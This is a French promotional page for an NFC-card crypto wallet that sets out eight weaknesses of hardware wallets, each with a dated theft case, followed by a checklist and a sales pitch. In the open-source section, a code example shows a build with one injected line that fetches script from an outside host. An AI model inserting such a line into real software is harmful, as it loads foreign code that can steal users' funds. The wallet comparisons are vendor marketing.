8 failles Code ouvert Check-list Questions
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Créer un portefeuilleCréer
Portefeuilles hardware · failles non évidentes

Failles non évidentes du portefeuille hardware

Vous achetez un appareil pour fermer des trous. Avec lui arrivent de nouveaux : firmware, mises à jour, service sur l’ordinateur, écran, boîte, compte chez le vendeur. Huit détails classés en avantages dans les avis — et huit façons dont on a volé de l’argent à travers eux en 2020-2026.

Cas réels avec dates et montants D’après la documentation des fabricants Notre kit confronté à la même liste
Prix de l’erreurcas publics
2026Coldcard · aléatoire faible dans le firmware100+ M$
2025Bybit · les signataires ont signé autre chose que ce qu’ils voyaient1,5 Md$
2024Dark Skippy · la seed fuit via deux signaturesrecherche
2023Ledger Connect Kit · backdoor dans une bibliothèque600 k$
2021Fausse appli de portefeuille sur l’App Store17,1 BTC
2020Fuite de la base clients Ledger · phishing pendant des années270 000 pers.
Huit failles

Chaque détail vanté dans les avis est un trou à part

Le portefeuille hardware ferme un trou : la clé n’est plus sur un téléphone connecté. Mais l’appareil n’est pas vide. Il a un firmware, des mises à jour, un programme sur l’ordinateur, un écran, une boîte, un vendeur avec votre adresse — et chaque détail ajoute une surface d’attaque que vous n’aviez pas. Ci-dessous huit de ces détails : ce qu’en disent les avis, comment on a volé via eux, comment fermer la faille, et si notre kit a ce détail.

Faille 01

Le firmware qui crée votre clé

Dans les avis : « puce sécurisée, la clé est créée dans l’appareil et ne le quitte jamais »

La clé est un énorme nombre aléatoire, et c’est le firmware qui le fait. Une erreur dedans — et il y a en réalité peu de clés : on les brute-force chez tous les propriétaires à la fois, sans accès à l’appareil, des années après l’achat. La puce n’y est pour rien, le trou est au-dessus.

Cas
100+ M$
Coldcard, juillet 2026 : une erreur de build du firmware depuis 2021 remplaçait en silence le générateur matériel par un faible, ensemencé avec le numéro d’appareil et un timer. La solidité des clés est tombée à ~40 bits ; 5 000+ adresses vidées.
Comment fermer la faille
Peut-on apporter son propre aléatoire : dés, phrase personnelle. Un portefeuille qui accepte votre entropie ne dépend pas d’une seule erreur de firmware.
Ce détail n’existe pas chez nous
Sur la carte il n’y a pas de firmware — c’est un support chiffré. Mitilena Air crée la clé depuis le générateur système de l’appareil, et vous pouvez fixer votre propre phrase seed à la place de mots aléatoires.
Faille 02

Des mises à jour que vous êtes obligé d’installer

Dans les avis : « le fabricant publie régulièrement des mises à jour de sécurité »

Chaque mise à jour est le moment où l’on peut substituer le firmware. Un firmware trafiqué cache des morceaux de seed dans deux ou trois signatures ordinaires, et à l’extérieur l’appareil marche comme toujours. Ne pas mettre à jour non plus : ce sont les mises à jour qui ferment les trous.

Cas
2 signatures
Dark Skippy, août 2024 : des chercheurs ont montré qu’un firmware malveillant de portefeuille hardware exfiltre toute la seed via deux transactions. Une seule mise à jour depuis la mauvaise source suffit.
Comment fermer la faille
D’où viennent les firmwares et l’appareil vérifie-t-il leur signature. Le mieux : quand il n’y a rien à mettre à jour.
Ce détail n’existe pas chez nous
Sur la carte il n’y a rien à mettre à jour ni à substituer. C’est l’appli sur le téléphone qui signe ; ses builds sont signés et viennent de l’App Store et de Google Play — comme toute appli que vous voyez et fermez vous-même.
Faille 03 · Ressentez l’absurde
Dans les avis : « appli constructeur pratique pour l’ordinateur »

Un portefeuille pour la méfiance, livré avec un service

Vous achetez l’appareil pour une seule raison : ne plus faire confiance à l’ordinateur. Pour qu’il marche, il faut installer sur ce même ordinateur un service en arrière-plan. Vous ne l’avez pas écrit, pas lancé, pas contrôlé : il démarre avec le système, écoute un port auquel n’importe quel programme de votre machine peut frapper, et fait quelque chose maintenant — quoi exactement, vous ne savez pas et ne vérifierez jamais.

Il tournait en fond même après que vous avez fermé le portefeuille. Pendant des années. Chez l’un des plus grands fabricants, c’était un service-« pont » séparé ; en 2025 on l’a caché dans l’appli elle-même — le service est là, il meurt juste avec la fenêtre. Chez la plupart des autres, sans programme sur l’ordinateur l’appareil est un porte-clés. Sous Linux ajoutez des règles udev, sinon le système ne cède pas l’USB.

Autrement dit : la chose achetée pour ne plus dépendre des programmes sur l’ordinateur ne marche pas sans un programme sur l’ordinateur. Et pas celui que vous voyez — celui qui tourne en dessous.

Ce détail n’existe pas chez nous
Rien ne s’installe sur l’ordinateur : ni service, ni pilote, ni port. L’intermédiaire est la puce NFC déjà dans votre téléphone, faite par son fabricant et soumise au système d’exploitation : elle ne marche que quand l’appli est ouverte et que vous avez approché la carte, et le téléphone demande l’autorisation à chaque fois. La carte est passive : pas de batterie, pas de radio, elle ne fait rien seule. Vous fermez l’appli — il ne reste rien qui marche sans vous. Honnêtement : une appli téléphone est nécessaire, et c’est comme n’importe quelle autre — vous la voyez, la lancez et la fermez vous-même. Personne ne vit dans la remise.
Surveillance systèmePORTEFEUILLE FERMÉ
ProcessusÉtatActif
HW Wallet Appportefeuille
fermé par vous-
hwwalletdservice fond · pont USB
actif412 j. 06:14
lancé par le système à la connexionimpossible à fermer — c’est un service
Maquette, noms fictifs. Ainsi apparaissait un ordinateur avec l’un des USB-wallets les plus populaires jusqu’en 2025 ; ensuite le « pont » a été intégré à l’appli — même service, juste plus visible dans la liste.
Allégorie
Une maison pour la vie privée — et un locataire dans la remise

Vous vouliez une maison pour la vie privée. Vous l’avez achetée. Puis il a fallu une sécurité — installée. Et pour que le forfait marche, on vous a demandé de laisser entrer un homme en uniforme qui vit dans votre remise 24 h/24, a les clés de toutes les portes et rend compte à quelqu’un d’autre. Vous ne l’avez pas embauché, vous ne pouvez pas le licencier, et ce qu’il fait la nuit — vous l’ignorez.

Bien sûr, c’est « le leur ». C’est écrit dans le contrat. Vous vouliez la vie privée, vous avez un ersatz : une maison avec un locataire que vous n’avez pas choisi.

Faille 04 · Le code ouvert n’est pas un audit
Dans les avis : « code ouvert — n’importe qui peut vérifier »

Le code ouvert est un moyen pour les programmeurs de travailler ensemble, pas un signe que le programme ne vole pas

Le code source ouvert a été inventé pour partager les programmes et les réparer ensemble. C’est un outil de collaboration, et à ce titre il est excellent. Jamais il n’a été un label « ce logiciel ne volera pas votre argent », et voici pourquoi : vous n’utilisez pas le code source. Vous utilisez ce que vous avez téléchargé.

Entre le dépôt GitHub et le fichier sur votre téléphone : build, store d’applis, mise à jour, serveur. À n’importe laquelle de ces étapes une seule ligne peut entrer dans le code, charger n’importe quoi de n’importe où — et elle ne sera pas dans le dépôt. Vous ne pouvez pas comparer votre copie à la source : les stores livrent un binaire, le web-wallet reçoit à chaque ouverture le code que le serveur a choisi de vous donner aujourd’hui, l’extension navigateur se met à jour silencieusement la nuit.

« Ouvert » signifie que certaines personnes peuvent vérifier une certaine version un certain jour. Ce que fait votre copie maintenant — ça ne le signifie pas.

Dans le dépôt · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Sur votre téléphone · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Une ligne dans le build. Absente du dépôt, invisible dans le store, active chez vous.
L’ouverture n’a empêché aucun de ces cas
Ledger Connect Kit2023
bibliothèque ouverte sur GitHub ; une version malveillante publiée sur npm, des dizaines de sites l’ont chargée en direct en quelques heures
Copay / event-stream2018
portefeuille ouvert ; la backdoor est venue d’une dépendance visant précisément celui-ci
xz utils2024
ouvert depuis vingt ans ; une backdoor dans les releases jusqu’à ce qu’un ingénieur remarque par hasard que le login SSH était plus lent d’une demi-seconde
Coldcard2026
firmware open source ; une erreur de build a pendant cinq ans remplacé le générateur matériel par un faible — clés brute-forcées sans accès à l’appareil, 5 000+ adresses, 100+ M$
Ce qui marche alors
Pas lire le code d’autrui, mais deux contrôles accessibles à tous. Premier — audit de comportement : installez un proxy interceptant sur votre machine, passez l’appli dessus et regardez ce qu’elle envoie et où. Pas besoin de lire le code — le trafic est visible en entier. Second — une architecture où le code n’a rien à voler : si la clé n’est jamais sur un appareil connecté, toute ligne dans toute mise à jour est impuissante, elle n’a rien à envoyer.
Chez nous
Le premier, on le propose nous-mêmes : passez notre appli par un proxy, la version web par les DevTools du navigateur, et regardez chaque requête. La clé de signature et la seed n’y apparaissent pas ; seule réserve — la clé de vue Monero, décrite sur la page « comment le portefeuille envoie la crypto ». Le second est dans le kit : la clé naît dans Mitilena Air sur un appareil hors ligne, vit sur la carte, et seule la signature entre dans l’appli en ligne — rien à proxifier. Et l’offline ici est réel : en air-gap, l’appareil à clé n’est branché à rien — ni câble, ni Bluetooth ; la transaction entre et sort en QR que vous voyez de vos yeux. Pas un portefeuille « froid » au bout d’un fil, accroché à un PC en ligne avec son service et un échange opaque.
Faille 05

Un écran où l’on ne voit pas ce que l’on signe

Dans les avis : « confirmation sur l’écran de l’appareil — un virus sur le PC est impuissant »

L’écran est petit, et souvent ce n’est pas l’adresse et le montant, mais un hash ou un « appel de contrat ». Vous confirmez ce que vous ne voyez pas — et la signature est honnête, la vôtre. L’écran donne une sensation de contrôle qui n’existe pas.

Cas
1,5 Md$
Bybit, février 2025 : des signataires avec portefeuilles hardware ont confirmé un transfert qui semblait ordinaire dans l’interface. Les appareils ont montré des données qu’un humain ne pouvait pas vérifier.
Comment fermer la faille
Destinataire, montant et type d’opération en langage humain, pas un hash, et un refus en un bouton.
Chez nous
Il y a un écran, mais c’est celui du téléphone : adresse, montant et type de requête en mots — transfert, appel de contrat, autorisation — et un bouton « Refuser ». Pour les gros montants — un appareil séparé hors réseau, où la transaction arrive entière.
Faille 06

Une boîte où la seed est déjà là

Dans les avis : « livré dans une boîte scellée avec sceau de sécurité »

Un appareil physique, c’est livraison, intermédiaires et marketplaces « en promo ». Le portefeuille arrive déjà configuré, avec la seed sur un papier à l’intérieur. Ou une appli-clone dans le store demande d’« entrer la seed pour activer ».

Cas
17,1 BTC
App Store, 2021 : un propriétaire de portefeuille hardware a saisi sa seed dans une appli-clone et a perdu 17,1 BTC. La même année, après la fuite de base, on a envoyé aux clients Ledger de faux appareils avec la lettre « migrez la seed vers le nouveau ».
Comment fermer la faille
Initialiser soi-même et ne jamais utiliser une seed déjà écrite. Le sceau n’est pas une preuve ; la preuve, c’est que c’est vous qui créez la clé.
Chez nous
Les cartes arrivent vierges : vous créez et écrivez la clé vous-même ; une seed « prête » dans la boîte est impossible. L’appli — seulement depuis l’App Store et Google Play via les liens du site ; elle ne demande la seed qu’à l’import et à la signature.
Faille 07

Un compte chez le fabricant

Dans les avis : « garantie officielle, support et espace client »

Pour acheter l’appareil, vous laissez au fabricant nom, e-mail et adresse de livraison. Votre sécurité dépend alors de sa base. Si elle fuit — on vous écrira pendant des années « confirmez la seed sur le nouvel appareil », parfois avec des colis.

Cas
270 000 pers.
Ledger, 2020 : fuite des données de 270 000 acheteurs, adresses postales comprises. Lettres, appels et colis pour « migrer » la seed continuent encore.
Comment fermer la faille
Moins on sait de vous, plus le vecteur est court : achat sans compte, support qui ne demande jamais la seed, et la règle « seul un voleur demande la seed ».
Ce détail n’existe pas chez nous
Le portefeuille marche sans inscription, pas de compte. Le vendeur ne connaît que l’adresse de livraison. Ni le support ni l’appli ne demandent la seed.
Faille 08

Un seul appareil et un seul papier

Dans les avis : « boîtier robuste, grand écran, batterie pour une semaine »

Plus il y a de pièces, plus ça casse : connecteur, écran, batterie. Et la récupération tient à un seul papier avec la seed — trempé, perdu au déménagement, photographié « au cas où ». La cause la plus fréquente des pertes n’est pas le piratage.

Cas
≈20 % BTC
Selon Chainalysis, environ un cinquième de tous les bitcoins est perdu pour de bon — surtout à cause de clés perdues, pas de piratages.
Comment fermer la faille
Combien de copies de la clé dans la boîte et sous quelle forme, que se passe-t-il si l’appareil est perdu, y a-t-il quelque chose qui peut casser.
Ce détail n’existe pas chez nous
Pas d’écran, de batterie ni de connecteur — rien à casser. Et pas une copie, mais cinq miroirs dans la boîte : deux cartes NFC et trois stickers furtifs en plastique étanche, 10+ ans.
Check-list

Ce qui ne doit pas être dans un portefeuille

Huit détails pour huit failles. La liste vaut pour tout portefeuille — hardware, mobile, navigateur. Cochez ce qu’a celui que vous choisissez — et le nôtre aussi.

01
Une clé que seul le programme créesans votre aléatoire — phrase ou dés
02
Des mises à jour là où vit la cléchaque mise à jour — chance de substitution
03
Service, pilote ou port sur l’ordinateurvoir faille 03
04
Badge « open source » à la place d’une architectureclé là où du code étranger peut entrer
05
Écran avec un hash au lieu de l’adresse et du montantet pas de bouton « Refuser »
06
Une seed déjà écrite à l’arrivéedans la boîte, le courrier, l’« appli d’activation »
07
Un compte chez le fabricantet un support qui peut demander la seed
08
Une seule copie et des pièces qui cassentécran, batterie, connecteur, un seul papier
Le kit Ultimate n’a aucune des huit pièces de cette liste. Dans la boîte — 2 cartes NFC et 3 stickers furtifs, Mitilena Air (clés hors ligne) et Mitilena Keys (signature hors ligne). Les cartes arrivent vides : c’est vous qui créez et chiffrez la clé, pas une puce d’usine. Composition et prix →
Ultimate · kit offline

Pas une « puce sécurisée » d’usine — un support que vous chiffrez

Les cartes arrivent vides. Vous créez la clé dans Mitilena Air sur un téléphone hors ligne et l’écrivez vous-même. La signature — via Mitilena Keys, aussi hors réseau : la transaction circule en QR. Dans la boîte, cinq copies identiques : 2 cartes NFC et 3 stickers furtifs en plastique étanche. 18 réseaux, 20 000+ monnaies, USDT inclus.

Rien ne s’installe sur l’ordinateur
Pas de firmware, mises à jour, écran ni batterie
Transaction vers le téléphone offline — son ou QR, sans câble ni USB
Fonctionne avec l’appli Mitilena gratuite sur le téléphone
Plastique étanche, conservation 10+ ans
Livraison mondiale via mitilena-store.com
Carte NFC Mitilena
Ultimate · génération et signature hors réseau
€369€439
2 cartes NFC · 3 stickers furtifs · Mitilena Air · licence Mitilena Keys
Commander Ultimate · €369 Basic et Premium — voir tous les forfaits
Questions

Ce qu’on demande après avoir lu jusqu’ici

Avantages et inconvénients du portefeuille hardware, en bref ?

Un seul avantage, et il est gros : la clé n’est pas sur un téléphone connecté. Les inconvénients — les huit détails ci-dessus, chacun ajoute une surface d’attaque. Un bon portefeuille hardware est celui où il y a moins de détails, pas plus.

Et si le téléphone est infecté ?

Avec la carte sur le téléphone principal, la clé apparaît dans un environnement isolé le temps d’une signature — même risque que tout portefeuille téléphone, juste plus court. Pour les montants qui font peur — second niveau : signature sur un appareil séparé hors ligne, où la transaction arrive en QR.

Et si la carte est volée ou perdue ?

Sans mot de passe, carte et sticker sont du plastique inutile : la clé y est chiffrée. Et la copie perdue est remplacée par les quatre autres : deux cartes et trois stickers de la boîte — miroirs.

Faut-il mettre à jour le firmware d’un portefeuille hardware ?

Si le fabricant a fermé un trou — oui, et c’est exactement le moment où l’on peut substituer le firmware : vérifiez la source et la signature. Un support sans firmware n’a pas ce dilemme — rien à mettre à jour, rien à substituer.

En quoi cela diffère d’un portefeuille USB ?

Par l’absence d’intermédiaires : pas de câble, de pilote, de service fond ni de programme sur l’ordinateur. Un seul intermédiaire — la puce NFC de votre téléphone, soumise à vous et au système d’exploitation, pas au fabricant du portefeuille.

Code ouvert — donc sûr ?

Ça veut dire vérifiable par quelqu’un un jour. Vous n’utilisez pas le code, mais ce que vous avez téléchargé, et vous ne pouvez pas comparer l’un à l’autre. La sécurité vient d’une architecture où la clé n’est pas là où du code étranger peut entrer.

Cartes NFC avec génération et signature hors ligne

5 copies de la clé · Air · Keys · ou portefeuille gratuit en 30 secondes · Pourquoi le « froid » hardware sur puce est souvent un faux →
Commander Ultimate · €369 Créer un portefeuille gratuit